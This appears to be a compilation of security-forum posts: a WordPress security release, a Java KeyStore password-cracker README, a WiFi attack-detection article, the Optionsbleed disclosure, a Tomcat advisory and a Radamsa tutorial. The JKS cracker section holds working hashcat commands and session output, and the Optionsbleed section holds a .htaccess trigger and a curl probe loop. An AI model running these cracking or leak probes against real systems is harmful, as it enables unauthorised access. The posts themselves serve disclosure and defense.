  9. WordPress 4.8.2 Security and Maintenance Release Posted September 19, 2017 by Aaron D. Campbell. Filed under Releases, Security. WordPress 4.8.2 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.8.1 and earlier are affected by these security issues: $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi). WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability. Reported by Slavco A cross-site scripting (XSS) vulnerability was discovered in the oEmbed discovery. Reported by xknown of the WordPress Security Team. A cross-site scripting (XSS) vulnerability was discovered in the visual editor. Reported by Rodolfo Assis (@brutelogic) of Sucuri Security. A path traversal vulnerability was discovered in the file unzipping code. Reported by Alex Chapman (noxrnet). A cross-site scripting (XSS) vulnerability was discovered in the plugin editor. Reported by 陈瑞琦 (Chen Ruiqi). An open redirect was discovered on the user and term edit screens. Reported by Yasin Soliman (ysx). A path traversal vulnerability was discovered in the customizer. Reported by Weston Ruter of the WordPress Security Team. A cross-site scripting (XSS) vulnerability was discovered in template names. Reported by Luka (sikic). A cross-site scripting (XSS) vulnerability was discovered in the link modal. Reported by Anas Roubi (qasuar). Thank you to the reporters of these issues for practicing responsible disclosure. In addition to the security issues above, WordPress 4.8.2 contains 6 maintenance fixes to the 4.8 release series. For more information, see the release notes or consult the list of changes. 
Download WordPress 4.8.2 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.8.2. Thanks to everyone who contributed to 4.8.2. Sursa: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  10. JKS private key cracker - Nail in the JKS coffin The Java Key Store (JKS) is the Java way of storing one or several cryptographic private and public keys for asymmetric cryptography in a file. While there are various key store formats, Java and Android still default to the JKS file format. JKS is one of the file formats for Java key stores, but JKS is confusingly used as the acronym for the general Java key store API as well. This project includes information regarding the security mechanisms of the JKS file format and how the password protection of the private key can be cracked. Due to the unusual design of JKS, the developed implementation can ignore the key store password and crack the private key password directly. Because it ignores the key store password, this implementation can attack every JKS configuration, which is not the case with most other tools. By exploiting a weakness of the Password Based Encryption scheme for the private key in JKS, passwords can be cracked very efficiently. Until now, no public tool was available exploiting this weakness. This technique was implemented in hashcat to amplify the efficiency of the algorithm with higher cracking speeds on GPUs. To get the theory part, please refer to the POC||GTFO article "15:12 Nail in the Java Key Store Coffin" in issue 0x15 included in this repository (pocorgtfo15.pdf) or available on various mirrors like this beautiful one: https://unpack.debug.su/pocorgtfo/ Before you ask: JCEKS or BKS or any other key store format is not supported (yet). How you should crack JKS files The answer: build your own cracking hardware for it. 
But let's be a little more practical, so the answer is: use your GPU.

[hashcat v3.6.0 ASCII banner, advertising support for BLAKE2, BLOCKCHAIN2, DPAPI, CHACHA20, JAVA KEYSTORE and ETHEREUM WALLET]

All you need to do is run the following command:

java -jar JksPrivkPrepare.jar your_JKS_file.jks > hash.txt

If your hash.txt ends up being empty, there is either no private key in the JKS file or you specified a non-JKS file. Then feed the hash.txt file to hashcat (version 3.6.0 and above), for example like this:

$ ./hashcat -m 15500 -a 3 -1 '?u|' -w 3 hash.txt ?1?1?1?1?1?1?1?1?1
hashcat (v3.6.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2026/8107 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Precompute-Init
* Not-Iterated
* Appended-Salt
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

$jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test:POC||GTFO

Session..........: hashcat
Status...........: Cracked
Hash.Type........: JKS Java Key Store Private Keys (SHA1)
Hash.Target......: $jksprivk$*D1BC102EF5FE5F1A7ED6A63431767DD4E1569670...8*test
Time.Started.....: Tue May 30 17:41:58 2017 (8 mins, 25 secs)
Time.Estimated...: Tue May 30 17:50:23 2017 (0 secs)
Guess.Mask.......: ?1?1?1?1?1?1?1?1?1 [9]
Guess.Charset....: -1 ?u|, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 7946.6 MH/s (39.48ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4014116700160/7625597484987 (52.64%)
Rejected.........: 0/4014116700160 (0.00%)
Restore.Point....: 5505024000/10460353203 (52.63%)
Candidates.#1....: NNVGFSRFO -> Z|ZFVDUFO
HWMon.Dev.#1.....: Temp: 75c Fan: 89% Util:100% Core:1936MHz Mem:4513MHz Bus:1

Started: Tue May 30 17:41:56 2017
Stopped: Tue May 30 17:50:24 2017

So from this repository you basically only need the JksPrivkPrepare.jar to run a cracking session. Other things in this repository: test_run.sh: A little test script that you should be able to run after a couple of minutes to see this project in action. It includes comments on how to set up the dependencies for this project. benchmarking: tests that show why you should use this technique and not others. Please read the "Nail in the JKS coffin" article. example_jks: generate example JKS files. fingerprint_creation: Every plaintext private key in PKCS#8 has its own "fingerprint" that we expect when we guess the correct password. These fingerprints are necessary to make sure we are able to detect when we guessed the correct password. Please read the "Nail in the JKS coffin" article. This folder has the code to generate these fingerprints; it's a little bit hacky, but I don't expect that it will be necessary to add any other fingerprints ever. JksPrivkPrepare: The source code of how the JKS files are read and the hash calculated that we need to give to hashcat. jksprivk_crack.py: A proof of concept implementation that can be used instead of hashcat. Obviously this is much slower than hashcat, but it can outperform John the Ripper (JtR) in certain cases. Please read the "Nail in the JKS coffin" article. jksprivk_decrypt.py: A little helper script that can be used to extract a private key once the password has been correctly guessed. run_example_jks.sh: A script that runs JksPrivkPrepare.jar and jksprivk_crack.py on all example JKS files in the example_jks folder. Make sure you run the generate_examples.py script in example_jks first. 
Related work and further links A big shout to Casey Marshall who wrote the JKS.java class, which is used in a modified version in this project: /* JKS.java -- implementation of the "JKS" key store. Copyright (C) 2003 Casey Marshall <rsdio@metastatic.org> Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. No representations are made about the suitability of this software for any purpose. It is provided "as is" without express or implied warranty. This program was derived by reverse-engineering Sun's own implementation, using only the public API that is available in the 1.4.1 JDK. Hence nothing in this program is, or is derived from, anything copyrighted by Sun Microsystems. While the "Binary Evaluation License Agreement" that the JDK is licensed under contains blanket statements that forbid reverse-engineering (among other things), it is my position that US copyright law does not and cannot forbid reverse-engineering of software to produce a compatible implementation. There are, in fact, numerous clauses in copyright law that specifically allow reverse-engineering, and therefore I believe it is outside of Sun's power to enforce restrictions on reverse-engineering of their software, and it is irresponsible for them to claim they can. 
*/ More related links, which are also mentioned in the article: JKS is going to be replaced as the default key store type in Java 9
http://openjdk.java.net/jeps/229
https://gist.github.com/zach-klippenstein/4631307
http://www.openwall.com/lists/john-users/2015/06/07/3
https://github.com/bes/KeystoreBrute
https://github.com/jeffers102/KeystoreCracker
https://github.com/volure/keystoreBrute
https://gist.github.com/robinp/2143870
https://www.darknet.org.uk/2015/06/patator-multi-threaded-service-url-brute-forcing-tool/
https://github.com/rsertelon/android-keystore-recovery
https://github.com/MaxCamillo/android-keystore-password-recover
https://cryptosense.com/mighty-aphrodite-dark-secrets-of-the-java-keystore/
https://hashcat.net/events/p12/js-sha1exp_169.pdf
https://github.com/hashcat/hashcat
Neighborly greetings go out to atom, vollkorn, cem, doegox, corkami, xonox and rexploit for supporting this research in one form or another! Sursa: https://github.com/floyd-fuh/JKS-private-key-cracker-hashcat
  11. Nytro

    Fun stuff

  12. Nytro

    Kali update

    I think so.
  13. But aren't the uploaded files also checked by someone?
  14. Physical Penetration Testing Walter Belgers Your pentesting goal: getting the data. You decide to do it physically. How do you go about it? #PhysicalSecurity Link: https://media.ccc.de/v/SHA2017-24-physical_penetration_testing
  15. Wireless LAN auditing procedure for industrial environments Magnus Andreas Ohm Abstract Today’s industry is dependent on computer networks. These computer networks are a vital part of how industrial environments operate. They are used for a variety of different tasks. Networks are needed to do everything from operating possibly dangerous equipment to supporting employees in their everyday activities. Having to support such a variety of tasks means that these networks need to fulfill a lot of different requirements to function in a proper and safe way. DNV-GL has seen that these requirements are often not upheld in industrial environments. They have therefore seen a business opportunity when it comes to testing networks that operate in these types of environments. Download: https://brage.bibsys.no/xmlui/bitstream/handle/11250/2441138/16203_FULLTEXT.pdf
  16. Common WiFi Attacks And How To Detect Them Posted on September 19, 2017 in wifi, security I'm talking about DFIR (Digital Forensics and Incident Response) for WiFi networks at DerbyCon 2017 and will be releasing nzyme (an open source tool to record and forward 802.11 management frames into Graylog for WiFi security monitoring and incident response) soon. Note that I will simplify some of the 802.11 terminology in this post. For example, I'll talk about "devices" and not "stations," and I'll not use the term "BSS" for "networks." The Issue With 802.11 Management Frames The 802.11 WiFi standard contains a special frame (think "packets" in classic, wired networking) type for network and connection management. For example, your computer is not actively "scanning for networks" when you hit the tray icon to see all networks in range, but it passively listens for so-called "beacon" management frames from access points broadcasting to the world that they are there and available. Another management frame is the "probe-request" ("Hi, is my home network in range?") that your devices send to see if networks they have connected to before are in range. If such a network is in range, the relevant access points would respond with a "probe-response" frame ("Hi, yes I'm here! You can connect to me without waiting for a beacon frame.") The problem with management frames is that they are completely unencrypted. This makes WiFi easy to use because, for example, you can see networks and their names around you without exchanging some key or password first, but it also makes WiFi networks prone to many kinds of attacks. Common Attacks Explained Sniffing Traffic Virtually all WiFi traffic can be sniffed with adapters in monitor mode. Most Linux distributions can put certain WiFi chipsets into this special mode, which will process all traffic in the air and not only that of a network you are connected to. 
Everyone can get WiFi adapters with such a chipset from Amazon, some for less than $20. Encrypted networks will also not really protect you. WEP encryption can be cracked in a matter of minutes, and even WPA2-PSK is not secure if you know the passphrase of a network (for example, because it's the office network and you work there, or because the local coffee shop has it written on the door) and can listen to the association process of the device. This works because the device-specific encryption between you and the access point uses a combination of the network passphrase and another key that is publicly exchanged (remember, management frames are not encrypted) during the association process. An attacker could force a new authentication process by spoofing a deauthentication frame that will disconnect your device for a moment. (more on that below) Detecting Sniffers Sniffing traffic is passive and cannot be detected. As a user, consider all WiFi traffic, on open or closed networks, to be public and make sure to use encryption on higher layers, like HTTPS. (Really, you should be doing this anyway, in any network.) Brute-Forcing Access Like any other password, passphrases for wireless networks can be brute-forced. WEP can be cracked by analyzing recorded traffic within minutes and has been rendered useless. For WPA-secured networks you'd need a standard dictionary attack that just tries a lot of passwords. Detecting Brute Force Attacks Brute-forcing by actually authenticating to an access point is extremely slow and not even necessary. Most brute force cracking tools work against recorded (sniffed) WiFi traffic. An attacker could just quietly sit in the car in front of your office, recording traffic for some time, and then crack the password at home. Like sniffing, this approach cannot be detected. The only protection is to use a strong password and to avoid WEP. Jamming The obvious way of jamming WiFi networks would be just to pump the relevant frequencies full of garbage. 
However, this would require fairly specialist equipment and maybe even quite some transmitting power. Surprisingly, the 802.11 standard brings a much easier way: deauthentication and disassociation frames. Those "deauth" frames are supposed to be used in different scenarios, and the standard has more than 40 pre-defined reason codes. I selected a few to give you an idea of some legitimate use-cases: Previous authentication no longer valid Disassociated due to inactivity Disassociated because AP is unable to handle all currently associated STAs Association denied due to requesting STA not supporting all of the data rates in the BSSBasicRateSet parameter Requested from peer STA as the STA is leaving the BSS (or resetting) Because deauth frames are management frames, they are unencrypted, and anyone can spoof them even when not connected to a network. Attackers in range can send constant deauth frames that appear to come from the access point you are connected to (by just setting the "transmitter" address in the frame) and your device will listen to that instruction. There are "jammer" scripts that sniff out a list of all access points and clients, while constantly sending deauth frames to all of them. Detecting Jammers A tool like nzyme (to be released - see introduction) would sniff out the deauth frames, and Graylog could alert on unusual levels of this frame subtype. Rogue Access Points Let's talk about how your phone automatically connects to WiFi networks it thinks it knows. There are two different ways this can happen: It picks up beacon frames ("Hi, I'm network X and I'm here.") of a network it knows and starts associating with the closest (strongest signal) access point. It sends a probe-request frame ("Hello, is an access point serving network X around?") for a known network and an access point serving such a network responds with a probe-response frame. ("Hello, yep I'm here!") Your phone will then connect to that access point. 
Here is the problem: Any device can send beacon and probe-response frames for any network. Attackers can walk around with a rogue access point that responds to any probe-request with a probe-response, or they could start sending beacons for a corporate network they are targeting. Some devices now have protections and will warn you if they are about to connect to a network that is not encrypted but was previously encrypted. However, this does not help if an attacker knows the password or just targets the unencrypted network of your coffee shop. Your phone would blindly connect, and now you have an attacker sitting in the middle of your connection, listening to all your communications or starting attacks like DNS or ARP poisoning. An attacker could even show you a malicious captive portal (the sign-in website some WiFi networks show you before they'll let you in) to phish or gather more information about your browser. Take a look at a miniaturized attack platform like the famous WiFi Pineapple to get an idea of how easy it is to launch these kinds of attacks. Rogue access points are notoriously hard to spot because it's complicated to locate them physically and they usually blend into the existing access point infrastructure quite well - at least on the surface. Here are some ways to still spot them using my to-be-released tool nzyme and Graylog: Detecting Rogue Access Points Method 1: BSSID whitelisting Like other network devices, every WiFi access point has a MAC address that is part of every message it sends. A simple way to detect rogue access points is to keep a list of your trusted access points and their MAC addresses and to match this against the MAC addresses that you see in the air. The problem is that an attacker can easily spoof the MAC address and, by doing that, circumvent this protective measure. Method 2: Non-synchronized MAC timestamps It is important that every access point serving the same network has a highly synchronized internal clock. 
For that reason, the access points are constantly exchanging timestamps for synchronization in their beacon frames. The unit here is microseconds, and the goal is to stay synchronized within a delta of 25µs. Most rogue access points will not attempt to synchronize the timestamps properly, and you can detect that slip. Method 3: Wrong channel You could keep a list of what channels your access points are operating on and find out if a rogue access point is using a channel your infrastructure is not supposed to use. For an attacker, evading this method is extremely easy: Recon the site first and configure the rogue access point to only use already used channels. Another caveat here is that many access points will dynamically switch channels based on capacity anyway. Method 4: Crypto drop An attacker who does not know the password of an encrypted network she targets might start a rogue access point that spins up an open network instead. Search for networks with your name, but no (or the wrong) encryption. Method 5: Signal strength anomalies There are many ways to spot a rogue access point by analyzing signal strength baselines and looking for anomalies. If an attacker sits in the parking lot and is spoofing one of your access points, including its MAC address (BSSID), it will suddenly show a change in the mean signal strength because the attacker is further away from the sensor (nzyme) than the real access point. What's Next? I will share another post with examples on how to detect these attacks using nzyme and Graylog soon. For updates, make sure to follow me on Twitter or to subscribe to the blog. Written By Lennart Koopmann Follow me on Twitter or subscribe to the blog. Sursa: https://wtf.horse/2017/09/19/common-wifi-attacks-explained/
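To make the "alert on unusual levels of this frame subtype" idea from the jamming section concrete, here is a minimal sliding-window detector in Python. This is a sketch under my own assumptions (nzyme had not been released when the post was written, so the class, thresholds and field names are invented; a real deployment would feed it parsed 802.11 headers from a monitor-mode capture):

```python
from collections import Counter, deque

MGMT = 0                     # 802.11 frame type for management frames
DEAUTH, DISASSOC = 12, 10    # management subtypes abused by jammer scripts

class DeauthDetector:
    """Alert when a transmitter sends more deauth/disassoc frames
    inside a sliding time window than a fixed threshold."""

    def __init__(self, window_s=10.0, threshold=20):
        self.window_s = window_s
        self.threshold = threshold
        self._events = deque()  # (timestamp, transmitter MAC)

    def observe(self, ts, frame_type, subtype, transmitter):
        # record only the deauth/disassoc management frames
        if frame_type == MGMT and subtype in (DEAUTH, DISASSOC):
            self._events.append((ts, transmitter))
        # age out events that have left the sliding window
        while self._events and self._events[0][0] < ts - self.window_s:
            self._events.popleft()

    def alerts(self):
        # transmitters responsible for an unusual number of frames
        counts = Counter(tx for _, tx in self._events)
        return {tx: n for tx, n in counts.items() if n > self.threshold}
```

A healthy network sees the occasional legitimate deauth (inactivity, AP overload), which is why the alert fires on rate rather than mere presence of the subtype.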
  17. rVMI: Perform Full System Analysis with Ease September 18, 2017 | by Jonas Pfoh, Sebastian Vogl | Threat Research Manual dynamic analysis is an important concept. It enables us to observe the behavior of a sophisticated malware sample or exploit by executing it in a controlled environment. The information gathered through this process is often crucial in gaining a full understanding of a sample. When performing manual dynamic analysis today, there are essentially two tools one can use: debuggers and sandboxes. While both of these tools are certainly very valuable, neither has been designed for the purpose of manual dynamic analysis. As a consequence, both approaches have inherent shortcomings that make interactive dynamic analysis difficult and tedious. In this blog post we present a novel approach to manual dynamic analysis: rVMI. rVMI was specifically designed for interactive malware analysis. It combines virtual machine introspection (VMI) and memory forensics to provide a platform for interactive and scriptable analysis. This blog post follows our presentation at Black Hat USA 2017. What is rVMI? rVMI can best be described as a debugger on steroids. In contrast to traditional debuggers, rVMI operates entirely outside of the target environment and allows the analysis of a live system from the hypervisor-level. This is achieved by combining VMI with memory forensics. In particular, rVMI makes use of full system virtualization to move the debugger out of the virtual machine (VM) to the hypervisor-level. As a result, the debugger runs isolated from the malware executed in a QEMU/KVM VM. This gives the analyst complete control over the target through VMI while keeping the malware in an isolated, debugger free environment. In addition, this enables an analyst to pause and resume the VM at any point in time as well as making use of traditional debugging functionality such as breakpoints and watchpoints. 
To bridge the semantic gap and support full system analysis, rVMI makes use of Rekall. Rekall is a powerful open source memory forensics framework. It provides a wide range of features that allow one to enumerate processes, inspect kernel data structures, access process address spaces, and much more. While Rekall usually works with static memory dumps, rVMI extends Rekall to support live VMs. This enables an analyst to leverage the entire Rekall feature set while performing an analysis with rVMI, effectively allowing them to inspect user space processes, kernel drivers, and even pre-boot environments with a single tool. rVMI supports all operating systems that Rekall supports, including Windows (XP-10), Linux, and Mac OS X. Analysis is performed through an iPython shell that makes all Rekall and VMI features available through a single interface. In addition, rVMI provides a Python API that makes it easy to automate tasks through external scripts or on-the-fly within the iPython shell. Finally, rVMI supports snapshots, which allows an analyst to easily save or restore states of the target environment. Articol complet: https://www.fireeye.com/blog/threat-research/2017/09/rvmi-full-system-analysis.html
  18. X41 Browser Security White Paper - Tools and PoCs X41 D-Sec GmbH (“X41”) - a research driven IT-Security company - released an in-depth analysis of the three leading enterprise web browsers Google Chrome, Microsoft Edge, and Internet Explorer. The full paper can be downloaded at: https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf (Sha256 d05d9df68ad8d6cee1491896b21485a48296f14112f191253d870fae16dc17de) Sursa: https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf
  19. https://blog.avast.com/update-to-the-ccleaner-5.33.1612-security-incident
  20. Optionsbleed - HTTP OPTIONS method can leak Apache's server memory Posted by Hanno Böck on Monday, September 18. 2017 If you're using the HTTP protocol in everyday Internet use you are usually only using two of its methods: GET and POST. However, HTTP has a number of other methods, so I wondered what you can do with them and if there are any vulnerabilities. One HTTP method is called OPTIONS. It simply allows asking a server which other HTTP methods it supports. The server answers with the "Allow" header and gives us a comma separated list of supported methods. A scan of the Alexa Top 1 Million revealed something strange: Plenty of servers sent out an "Allow" header with what looked like corrupted data. Some examples: Allow: ,GET,,,POST,OPTIONS,HEAD,, Allow: POST,OPTIONS,,HEAD,:09:44 GMT Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE That clearly looked interesting - and dangerous. It suspiciously looked like a "bleed"-style bug, which has become a name for bugs where arbitrary pieces of memory are leaked to a potential attacker. However these were random servers on the Internet, so at first I didn't know what software was causing this. Sometimes HTTP servers send a "Server" header telling the software. However one needs to be aware that the "Server" header can lie. It's quite common to have one HTTP server proxying another. I got all kinds of different "Server" headers back, but I very much suspected that these were all from the same bug. I tried to contact the affected server operators, but only one of them answered, and he was extremely reluctant to tell me anything about his setup, so that wasn't very helpful either. 
However I got one clue: Some of the corrupted headers contained strings that were clearly configuration options from Apache. It seemed quite unlikely that those would show up in the memory of other server software. But I was unable to reproduce anything alike on my own Apache servers. I also tried reading the code that put together the Allow header to see if I could find any clues, but with no success. So without knowing any details I contacted the Apache security team. Fortunately Apache developer Jacob Champion dug into it and figured out what was going on: Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer. (However ASAN doesn't work reliably due to the memory allocation abstraction done by APR.) FAQ What's Optionsbleed? Optionsbleed is a use after free error in Apache HTTP that causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked. The bug appears if a webmaster tries to use the "Limit" directive with an invalid HTTP method. Example .htaccess: <Limit abcxyz> </Limit> How prevalent is it? Scanning the Alexa Top 1 Million revealed 466 hosts with corrupted Allow headers. In theory it's possible that other server software has similar bugs. On the other hand this bug is nondeterministic, so not all vulnerable hosts may have been caught. 
So it only happens if you set a quite unusual configuration option? There's an additional risk in shared hosting environments. The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system. I can't reproduce it! Due to its nature the bug doesn't appear deterministically. It only seems to appear on busy servers. Sometimes it only appears after multiple requests. Does it have a CVE? CVE-2017-9798. I'm seeing Allow headers containing HEAD multiple times! This is actually a different Apache bug (#61207) that I found during this investigation. It causes HEAD to appear three times instead of once. However it's harmless and not a security bug. Launchpad also has a harmless bug that produces a malformed Allow header, using a space-separated list instead of a comma-separated one. How can I test it? A simple way is to use Curl in a loop and send OPTIONS requests: for i in {1..100}; do curl -sI -X OPTIONS https://www.google.com/|grep -i "allow:"; done Depending on the server configuration it may not answer to OPTIONS requests on some URLs. Try different paths, HTTP versus HTTPS hosts, non-www versus www etc. may lead to different results. Please note that this bug does not show up with the "*" OPTIONS target, you need a specific path. Here's a python proof of concept script. What shall I do? If you run an Apache web server you should update. Most distributions should have updated packages by now or very soon. A patch can be found here. A patch for Apache 2.2 is available here (thanks to Thomas Deutschmann for backporting it). Unfortunately the communication with the Apache security team wasn't ideal. They were unable to provide a timeline for a coordinated release with a fix, so I decided to define a disclosure date on my own without an upstream fix. 
If you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you are doing right now, update immediately and make sure you restart the server afterwards. Is this as bad as Heartbleed? No. Although similar in nature, this bug leaks only small chunks of memory and more importantly only affects a small number of hosts by default. It's still a pretty bad bug, particularly for shared hosting environments. Updates: Distribution updates: Gentoo: Commit (2.2.34 / 2.4.27-r1 fixed), Bug NetBSD/pkgsrc: Commit Arch Linux: Commit (2.4.27-2 fixed) Debian: unfixed, Security Tracker Media: Apache-Webserver blutet (Golem.de) Sursa: https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html
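The curl loop above can be automated. A valid Allow header is just a comma-separated list of HTTP method tokens, so a small heuristic catches the corrupted variants shown at the top of the post. This is my own sketch (deliberately stricter than the RFC 7231 token grammar, since real method names are short words), not the author's Python proof of concept:

```python
import re

# Method names in practice are short alphabetic words (GET, PROPFIND, ...).
# The RFC token grammar is wider, but a stricter check suits a leak scanner:
# anything with spaces, digits, '=' or '!' in it is worth a second look.
_METHOD = re.compile(r"[A-Za-z][A-Za-z-]*")

def looks_corrupted(allow_value):
    """Return True if an Allow header value does not look like a clean
    comma-separated list of HTTP method tokens."""
    parts = [p.strip() for p in allow_value.split(",")]
    if any(p == "" for p in parts):
        return True  # empty members such as "GET,,POST" are a red flag
    return any(not _METHOD.fullmatch(p) for p in parts)
```

In a survey you would loop OPTIONS requests over many paths per host, as the post notes, since some URLs never answer OPTIONS and the leak only shows up nondeterministically.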
  21. [SECURITY] CVE-2017-12615 Apache Tomcat Remote Code Execution via JSP upload

From: Mark Thomas <markt@xxxxxxxxxx>
To: Tomcat Users List <users@xxxxxxxxxxxxxxxxx>
CC: "announce@xxxxxxxxxxxxxxxxx" <announce@xxxxxxxxxxxxxxxxx>, announce@xxxxxxxxxx, Tomcat Developers List <dev@xxxxxxxxxxxxxxxxx>
Date: Tue, 19 Sep 2017 11:58:44 +0100

CVE-2017-12615 Apache Tomcat Remote Code Execution via JSP Upload

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: Apache Tomcat 7.0.0 to 7.0.79

Description:
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Mitigation:
Users of the affected versions should apply one of the following mitigations:
- Upgrade to Apache Tomcat 7.0.81 or later (7.0.80 was not released)

Credit:
This issue was reported responsibly to the Apache Tomcat Security Team by iswin from 360-sg-lab (360观星实验室)

History:
2017-09-19 Original advisory

References:
[1] http://tomcat.apache.org/security-7.html

Sursa: https://mailinglist-archive.mojah.be/varia-announce/2017-09/msg00010.php
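For reference, the readonly parameter mentioned in the advisory lives on the DefaultServlet declaration in Tomcat's conf/web.xml. A configuration that enables HTTP PUT, and thus makes this issue reachable, looks roughly like this (the servlet name and class are standard Tomcat; the added init-param is the dangerous part):

```
<!-- conf/web.xml: DefaultServlet with readonly set to false,
     which enables PUT/DELETE and exposes CVE-2017-12615 on Windows. -->
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
```

The parameter defaults to true, which is why default installations are not affected.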
  22. Nytro

    Kali update

    I updated Kali today and the graphical login stopped working. If the same happens to you:
    - Press Ctrl + Alt + F3
    - Log in
    - apt-get --fix-broken install
    - apt-get autoremove
    Via: https://unix.stackexchange.com/questions/391143/kali-2017-2-graphical-login-fails
  23. Anything useful in there?
  24. Nasty stuff
  25. A Crash Course to Radamsa

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them. The main selling points of radamsa are that it has already found a slew of bugs in programs that actually matter, it is easily scriptable and easy to get up and running.

Nutshell:

$ # please please please fuzz your programs. here is one way to get data for it:
$ sudo apt-get install gcc make git wget
$ git clone https://github.com/aoh/radamsa.git && cd radamsa && make && sudo make install
$ echo "HAL 9000" | radamsa

What the Fuzz

Programming is hard. All nontrivial programs have bugs in them. What's more, even the simplest typical mistakes in some of the most widely used programming languages are usually enough for attackers to gain undesired powers.

Fuzzing is one of the techniques to find such unexpected behavior in programs. The idea is simply to subject the program to various kinds of inputs and see what happens. There are two parts to this process: getting the various kinds of inputs, and seeing what happens. Radamsa is a solution to the first part; the second part is typically a short shell script. Testers usually have a more or less vague idea of what should not happen, and they try to find out whether this is so. This kind of testing is often referred to as negative testing, being the opposite of positive unit or integration testing. Developers know a service should not crash, should not consume exponential amounts of memory, should not get stuck in an infinite loop, etc. Attackers know that they can probably turn certain kinds of memory safety bugs into exploits, so they typically fuzz instrumented versions of the target programs and wait for such errors to be found.
In theory, the idea is to disprove, by finding a counterexample, a theorem about the program stating that for all inputs something bad doesn't happen.

There are many kinds of fuzzers and ways to apply them. Some trace the target program and generate test cases based on its behavior. Some need to know the format of the data and generate test cases based on that information. Radamsa is an extremely "black-box" fuzzer, because it needs no information about the program nor the format of the data. One can pair it with coverage analysis during testing to likely improve the quality of the sample set during a continuous test run, but this is not mandatory. The main goal is to first get tests running easily, and then refine the technique applied if necessary.

Radamsa is intended to be a good general-purpose fuzzer for all kinds of data. The goal is to be able to find issues no matter what kind of data the program processes, whether it's xml or mp3, and conversely that not finding bugs implies that other similar tools likely won't find them either. This is accomplished by having various kinds of heuristics and change patterns, which are varied during the tests. Sometimes there is just one change, sometimes there are a slew of them, sometimes there are bit flips, sometimes something more advanced and novel.

Radamsa is a side product of OUSPG's Protos Genome Project, in which some techniques to automatically analyze and examine the structure of communication protocols were explored. A subset of one of the tools turned out to be a surprisingly effective file fuzzer. The first prototype black-box fuzzer tools mainly used regular and context-free formal languages to represent the inferred model of the data.
Requirements

Supported operating systems:
- GNU/Linux
- OpenBSD
- FreeBSD
- Mac OS X
- Windows (using Cygwin)

Software requirements for building from sources:
- gcc / clang
- make
- git

Building Radamsa

$ git clone https://github.com/aoh/radamsa.git
$ cd radamsa
$ make
$ sudo make install # optional, you can also just grab bin/radamsa
$ radamsa --help

Radamsa itself is just a single binary file which has no external dependencies. You can move it where you please and remove the rest.

Fuzzing with Radamsa

This section assumes some familiarity with UNIX scripting.

Radamsa can be thought of as the cat UNIX tool, which manages to break the data in often interesting ways as it flows through. It also has support for generating more than one output at a time and acting as a TCP server or client, in case such things are needed.

Use of radamsa will be demonstrated by means of small examples. We will use the bc arbitrary precision calculator as an example target program.

In the simplest case, from a scripting point of view, radamsa can be used to fuzz data going through a pipe.

$ echo "aaa" | radamsa
aaaa

Here radamsa decided to add one 'a' to the input. Let's try that again.

$ echo "aaa" | radamsa
ːaaa

Now we got another result. By default radamsa will grab a random seed from /dev/urandom if it is not given a specific random state to start from, and you will generally see a different result every time it is started, though for small inputs you might see the same output or the original fairly often.

The random state to use can be given with the -s parameter, which is followed by a number. Using the same random state will result in the same data being generated.

$ echo "Fuzztron 2000" | radamsa --seed 4
Fuzztron 4294967296

This particular example was chosen because radamsa happens to choose to use a number mutator, which replaces textual numbers with something else. Programmers might recognize why, for example, this particular number might be an interesting one to test for.
You can generate more than one output by using the -n parameter as follows:

$ echo "1 + (2 + (3 + 4))" | radamsa --seed 12 -n 4
1 + (2 + (2 + (3 + 4?)
1 + (2 + (3 +?4))
18446744073709551615 + 4)))
